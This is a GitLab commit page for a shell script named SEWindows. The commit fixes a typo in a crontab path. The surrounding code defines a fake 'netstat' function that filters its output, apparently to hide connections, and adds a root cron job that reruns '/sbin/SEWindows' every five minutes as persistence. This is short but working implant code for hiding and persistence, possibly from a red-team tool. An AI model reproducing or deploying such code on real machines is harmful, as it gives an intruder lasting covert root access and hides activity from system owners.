UNCLASSIFIED

Skip to content
Snippets Groups Projects
Commit 6f164080 authored by Avery Kleeman's avatar Avery Kleeman
Browse files

Update SEWindows

parent 57eddb1a
No related merge requests found
......@@ -31,7 +31,7 @@ echo -e "function netstat() {\n\t/usr/bin/netstat -tunap | /usr/bin/sed -e 's/65
fi
# Create Persistence
if ! grep -Eq '/sbin/SEWindows$' /etc/cronta
if ! grep -Eq '/sbin/SEWindows$' /etc/crontab
then
echo '*/5 * * * * root /sbin/SEWindows' >> /etc/crontab
fi
\ No newline at end of file
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment